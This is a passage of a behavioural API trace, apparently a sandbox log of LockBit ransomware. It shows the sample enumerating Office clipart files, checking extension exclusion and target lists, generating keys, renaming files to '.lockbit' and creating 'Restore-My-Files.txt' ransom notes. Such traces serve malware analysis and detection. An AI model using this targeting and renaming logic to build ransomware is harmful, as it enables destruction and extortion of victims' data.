pbBuffer=0x3e3004c) returned 0x0 [0144.427] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.432] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.432] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.432] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.434] free (_Block=0x1fa2ed8) [0144.434] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.434] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.434] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.434] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4844, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0151047.WMF", cAlternateFileName="")) returned 1 [0144.434] lstrcmpiW (lpString1=".", lpString2="J0151047.WMF") returned -1 [0144.434] lstrcmpiW (lpString1="..", lpString2="J0151047.WMF") returned -1 [0144.434] PathFindExtensionW (pszPath="J0151047.WMF") returned=".WMF" [0144.434] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.434] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.434] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.434] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.434] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.434] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.434] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.434] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.434] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.434] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.434] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.434] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.435] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.435] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0151047.WMF") returned 1 [0144.436] lstrcmpiW (lpString1="ntldr", lpString2="J0151047.WMF") returned 1 [0144.436] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0151047.WMF") returned 1 [0144.436] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0151047.WMF") returned -1 [0144.436] lstrcmpiW (lpString1="autorun.inf", lpString2="J0151047.WMF") returned -1 [0144.436] lstrcmpiW (lpString1="thumbs.db", lpString2="J0151047.WMF") returned 1 [0144.436] lstrcmpiW (lpString1="iconcache.db", lpString2="J0151047.WMF") returned -1 [0144.436] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.436] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned=".WMF" [0144.436] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.436] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.436] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.437] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.437] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF.lockbit") returned 72 [0144.437] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151047.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.438] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.439] malloc (_Size=0x40068) returned 0x3df0008 [0144.439] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=18500) returned 1 [0144.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.439] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.440] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.445] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.445] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.445] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.447] free (_Block=0x1fa2ed8) [0144.447] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.447] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.447] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.447] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3928, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0151055.WMF", cAlternateFileName="")) returned 1 [0144.448] lstrcmpiW (lpString1=".", lpString2="J0151055.WMF") returned -1 [0144.448] lstrcmpiW (lpString1="..", lpString2="J0151055.WMF") returned -1 [0144.448] PathFindExtensionW (pszPath="J0151055.WMF") returned=".WMF" [0144.448] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.448] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.448] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.448] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.449] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.449] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.450] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0151055.WMF") returned 1 [0144.450] lstrcmpiW (lpString1="ntldr", lpString2="J0151055.WMF") returned 1 [0144.450] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0151055.WMF") returned 1 [0144.450] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0151055.WMF") returned -1 [0144.450] lstrcmpiW (lpString1="autorun.inf", lpString2="J0151055.WMF") returned -1 [0144.450] lstrcmpiW (lpString1="thumbs.db", lpString2="J0151055.WMF") returned 1 [0144.450] lstrcmpiW (lpString1="iconcache.db", lpString2="J0151055.WMF") returned -1 [0144.450] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.451] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned=".WMF" [0144.451] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.451] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.451] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.452] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.452] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.452] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.452] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.452] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF.lockbit") returned 72 [0144.452] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151055.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.453] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.453] malloc (_Size=0x40068) returned 0x3df0008 [0144.454] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=14632) returned 1 [0144.454] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.454] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.454] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.455] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.459] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.459] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.459] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.461] free (_Block=0x1fa2ed8) [0144.461] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.461] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.461] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.461] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1a60, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0151061.WMF", cAlternateFileName="")) returned 1 [0144.461] lstrcmpiW (lpString1=".", lpString2="J0151061.WMF") returned -1 [0144.461] lstrcmpiW (lpString1="..", lpString2="J0151061.WMF") returned -1 [0144.461] PathFindExtensionW (pszPath="J0151061.WMF") returned=".WMF" [0144.461] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.461] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.461] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.461] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.461] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.461] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.461] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.461] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.461] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.461] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.461] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.462] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.462] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0151061.WMF") returned 1 [0144.463] lstrcmpiW (lpString1="ntldr", lpString2="J0151061.WMF") returned 1 [0144.463] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0151061.WMF") returned 1 [0144.463] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0151061.WMF") returned -1 [0144.463] lstrcmpiW (lpString1="autorun.inf", lpString2="J0151061.WMF") returned -1 [0144.463] lstrcmpiW (lpString1="thumbs.db", lpString2="J0151061.WMF") returned 1 [0144.463] lstrcmpiW (lpString1="iconcache.db", lpString2="J0151061.WMF") returned -1 [0144.463] PathAddBackslashW 